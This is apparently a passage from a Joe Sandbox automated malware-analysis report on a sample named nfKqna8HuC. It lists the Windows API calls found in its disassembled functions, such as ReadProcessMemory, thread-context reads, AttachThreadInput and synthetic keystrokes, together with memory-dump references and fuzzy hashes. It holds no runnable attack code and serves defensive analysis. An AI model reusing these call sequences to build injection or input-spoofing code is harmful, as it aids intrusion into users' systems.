                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014DE471
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014DE493
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                    • Instruction ID: 2325bc0c3f658259fa35395c5b6fbe48ee4d5d922e744d34d22a9f956fd7a062
                                                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                    • Instruction Fuzzy Hash: C312CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                    APIs
                                                                    • __flush.LIBCMT ref: 00642A0B
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __flush__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 4101623367-0
                                                                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                    • Instruction ID: e6b15e57d878af84ff71fc189714c4fb0fba44f058bbd2f6874d20b0836c8108
                                                                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                    • Instruction Fuzzy Hash: B8419271600707AFDB288EAAC8A05AE7BA7AF85360B74852DF855C7340EB71DD818B44
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: c1cd7d5de5d401efb5eea647d05ca9a930ac62803718d9e8820bbe43213deb4c
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 2D31B574A001059BD718DF58C4909A9FBA6FF49340F6486A5E40ADF396DB32EDC2CBE0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 52f8438f41f9486888d92898908f961c1fc6bc3fdda1b87662f110f893ad8558
                                                                    • Instruction ID: d7271179794e36846c1884ac5e6de758d3661545510079d570263c25ec6b4857
                                                                    • Opcode Fuzzy Hash: 52f8438f41f9486888d92898908f961c1fc6bc3fdda1b87662f110f893ad8558
                                                                    • Instruction Fuzzy Hash: 27417E705046118FEB24CF18C484B1ABBE2BF45314F1989ACE99A4B762C776F846CF92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 3074181302-0
                                                                    • Opcode ID: 0718f5e1a5540f167a2d882c854f38a3e97cf9afe5d0f2c9b46201b7d8a152ff
                                                                    • Instruction ID: 0a3bb492982db755c69dc0cbcb83a00dc6b50e4edc1e85767a574c21af6bbb0d
                                                                    • Opcode Fuzzy Hash: 0718f5e1a5540f167a2d882c854f38a3e97cf9afe5d0f2c9b46201b7d8a152ff
                                                                    • Instruction Fuzzy Hash: FB216F72C04A509FD7627FA8CC853587A63BF82335F260648F4714F2E2DBB58D018BA9
                                                                    APIs
                                                                      • Part of subcall function 00624214: FreeLibrary.KERNEL32(00000000,?), ref: 00624247
                                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006239FE,?,00000001), ref: 006241DB
                                                                      • Part of subcall function 00624291: FreeLibrary.KERNEL32(00000000), ref: 006242C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Free$Load
                                                                    • String ID:
                                                                    • API String ID: 2391024519-0
                                                                    • Opcode ID: ac99c153198e30e32355ca9a175c20a4636959a4d9afd14d0efa8a272c978f7b
                                                                    • Instruction ID: 602f0a5d6f655d0aefd1995e5530478d067002b70b166840d5e69c334baa959d
                                                                    • Opcode Fuzzy Hash: ac99c153198e30e32355ca9a175c20a4636959a4d9afd14d0efa8a272c978f7b
                                                                    • Instruction Fuzzy Hash: A011C131600626EACB14BB71EC16FAE77EB9F40700F10842DB596AA181DE719B019F68
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 13d566f4de22b18ae12cfa20f33568f684815f62ac8b7809fed63e4603a4de92
                                                                    • Instruction ID: 4c25e04b54ef8a815cb50902929fa71a52787675ab04653677eb051ad64fbd6c
                                                                    • Opcode Fuzzy Hash: 13d566f4de22b18ae12cfa20f33568f684815f62ac8b7809fed63e4603a4de92
                                                                    • Instruction Fuzzy Hash: 6E2127705086018FEB64DF64C454B5ABBE2BF85304F14496CE59A4B721C731F84ACF96
                                                                    APIs
                                                                    • ___lock_fhandle.LIBCMT ref: 0064AFC0
                                                                      • Part of subcall function 00647BDA: __getptd_noexit.LIBCMT ref: 00647BDA
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                                    • String ID:
                                                                    • API String ID: 1144279405-0
                                                                    • Opcode ID: 8e6529ee29cd69890a622d5dc241fc0b5f52238bfe3ac3d9d592a9ec9a0573b4
                                                                    • Instruction ID: be7269a3dcb8f4bea4765130ba868c0e245e3ef72b496a2ca19f5261ceb556fe
                                                                    • Opcode Fuzzy Hash: 8e6529ee29cd69890a622d5dc241fc0b5f52238bfe3ac3d9d592a9ec9a0573b4
                                                                    • Instruction Fuzzy Hash: C711C4728046409FD7527FE4C8817993A63AF82732F155748F4304F2E2C7B4CD418BAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                    • Instruction ID: fbbde4b10966f8ddae851db0b5304c4a40b91902e2affe9e851817914dfd3e70
                                                                    • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                    • Instruction Fuzzy Hash: 7B01863140051AEECF44EF64D8918FEBB7AAF10304F008029B55197195EB309B49DF64
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00642AED
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: f71793428127870d021e9e84b789fe4d6604de324e674c441479613a30224a00
                                                                    • Instruction ID: 1c38f243bcf672dea466b017e9c2b3f86f182520ccf85f3a6817ab76fbbaad28
                                                                    • Opcode Fuzzy Hash: f71793428127870d021e9e84b789fe4d6604de324e674c441479613a30224a00
                                                                    • Instruction Fuzzy Hash: 9AF0F631940206EBDF71AF75CC063DF3AA3BF01310F658419F8109B291C7788AA2DB55
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,006239FE,?,00000001), ref: 00624286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: c7df2fccb63f4f035647dac9003fd0d7925571e34e036e43570f18127e32ee08
                                                                    • Instruction ID: 87edab9e3c262d747a51e85f089f295aec9790f6bb1b57393b3f63ef97cc97ac
                                                                    • Opcode Fuzzy Hash: c7df2fccb63f4f035647dac9003fd0d7925571e34e036e43570f18127e32ee08
                                                                    • Instruction Fuzzy Hash: 8CF0307150AB22CFCB349F66E490856B7E6FF043153248A3EF1D686610CB719A40DF50
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006240C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath
                                                                    • String ID:
                                                                    • API String ID: 82841172-0
                                                                    • Opcode ID: 6016a02ea0bb43f2769d8badc10635cc9c5b9d31301a457e121af91e3b5ef4ed
                                                                    • Instruction ID: 689ec7239aff1933ab28eaea54156232ee64ca795afbeacac777ca709086e954
                                                                    • Opcode Fuzzy Hash: 6016a02ea0bb43f2769d8badc10635cc9c5b9d31301a457e121af91e3b5ef4ed
                                                                    • Instruction Fuzzy Hash: DAE0C236A002245BCB11A758DC46FEA77AEDF8C6A0F0900B9F909E7244DA74AD818A94
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                    • Instruction ID: dbfb885207e9341801d43e33528bdd40848afbb6db2fff8cde88908cad7af98f
                                                                    • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                    • Instruction Fuzzy Hash: 2CE092B0104B009FDB348A24D800BE377E1EF05305F00081CF2AAC7341EB6278818659
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 014DEC31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: c05ec30d72b0c7e7cff79b57c166a4ce8fad566895e8418a3d00c4430bfcff17
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: F5E0BF7494010DEFDB00EFA4D6496EE7BB4EF04702F1005A1FD05E7691DB309E548A62
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 014DEC31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063884765.00000000014DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DC000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_14dc000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 0c57fd9a208ccf9f9200744af102d2165109c6ca4423f5098dfd7e348a6068e7
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 9DE0E67494010DDFDB00EFB4D6496AE7FB4EF04702F100161FD01E2291D6309D508A62
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0068F87D
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068F8DC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068F919
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068F940
                                                                    • SendMessageW.USER32 ref: 0068F966
                                                                    • _wcsncpy.LIBCMT ref: 0068F9D2
                                                                    • GetKeyState.USER32(00000011), ref: 0068F9F3
                                                                    • GetKeyState.USER32(00000009), ref: 0068FA00
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068FA16
                                                                    • GetKeyState.USER32(00000010), ref: 0068FA20
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068FA4F
                                                                    • SendMessageW.USER32 ref: 0068FA72
                                                                    • SendMessageW.USER32(?,00001030,?,0068E059), ref: 0068FB6F
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0068FB85
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0068FB96
                                                                    • SetCapture.USER32(?), ref: 0068FB9F
                                                                    • ClientToScreen.USER32(?,?), ref: 0068FC03
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0068FC0F
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0068FC29
                                                                    • ReleaseCapture.USER32 ref: 0068FC34
                                                                    • GetCursorPos.USER32(?), ref: 0068FC69
                                                                    • ScreenToClient.USER32(?,?), ref: 0068FC76
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068FCD8
                                                                    • SendMessageW.USER32 ref: 0068FD02
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068FD41
                                                                    • SendMessageW.USER32 ref: 0068FD6C
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0068FD84
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0068FD8F
                                                                    • GetCursorPos.USER32(?), ref: 0068FDB0
                                                                    • ScreenToClient.USER32(?,?), ref: 0068FDBD
                                                                    • GetParent.USER32(?), ref: 0068FDD9
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068FE3F
                                                                    • SendMessageW.USER32 ref: 0068FE6F
                                                                    • ClientToScreen.USER32(?,?), ref: 0068FEC5
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0068FEF1
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068FF19
                                                                    • SendMessageW.USER32 ref: 0068FF3C
                                                                    • ClientToScreen.USER32(?,?), ref: 0068FF86
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0068FFB6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0069004B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 2516578528-4164748364
                                                                    • Opcode ID: df835258f219fe08c573b56af3f0f6db22e7825860d17b4bcdb11fa7292ef411
                                                                    • Instruction ID: eef0b5c60282ebd7ec2b63587baa31c034c27bfd0e770e016ce0e54b07a76bf2
                                                                    • Opcode Fuzzy Hash: df835258f219fe08c573b56af3f0f6db22e7825860d17b4bcdb11fa7292ef411
                                                                    • Instruction Fuzzy Hash: 2532ADB4604345EFDB10EF64C884BAABBBAFF4A354F140629F6558B2A1C731EC51CB51
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0068B1CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: %d/%02d/%02d
                                                                    • API String ID: 3850602802-328681919
                                                                    • Opcode ID: e782ed754ecccd542227b2966efb06cb056ad4e3a8d677d795cf33c9656ac487
                                                                    • Instruction ID: 562a7f8307d7a36f29a6ce42968aa45be3cea356db253d323391df9b570c0f7b
                                                                    • Opcode Fuzzy Hash: e782ed754ecccd542227b2966efb06cb056ad4e3a8d677d795cf33c9656ac487
                                                                    • Instruction Fuzzy Hash: 4B12E171500218ABEB24AF64DC49FAE7BBAFF45310F14521AFA1ADB2D1DB709902CF51
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0063EB4A
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00693AEA
                                                                    • IsIconic.USER32(000000FF), ref: 00693AF3
                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 00693B00
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00693B0A
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00693B20
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00693B27
                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00693B33
                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00693B44
                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00693B4C
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00693B54
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00693B57
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B6C
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00693B77
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B81
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00693B86
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B8F
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00693B94
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00693B9E
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00693BA3
                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00693BA6
                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00693BCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
